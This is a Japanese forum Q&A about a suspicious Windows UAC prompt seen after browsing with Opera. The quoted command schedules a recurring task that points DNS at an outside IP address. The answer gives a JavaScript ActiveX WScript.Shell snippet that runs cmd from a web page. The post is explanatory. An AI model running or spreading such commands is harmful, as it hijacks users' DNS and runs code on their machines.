ブラウザはどのようにcmdでコマンドを実行することができますか?
しばらく前にOpera 12.12に続くWindows7 UACプロンプトが画面に表示されました:
C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8")
明らかに、私はそれを断りました。
フィッシング詐欺師が私のデータを取得しようとした方法はかなり明確ですが、どのようにしてブラウザからコマンドを実行できたのでしょうか。
フィッシング詐欺師は、次のようなJavascriptを使用できます。
var wsh = new ActiveXObject('WScript.Shell');
command = 'cmd /k ' + 'what ever ...';
wsh.Run(command);
これは、ActiveXを使用する必要があるブラウザのセキュリティ機能をオフにした場合にのみ機能します。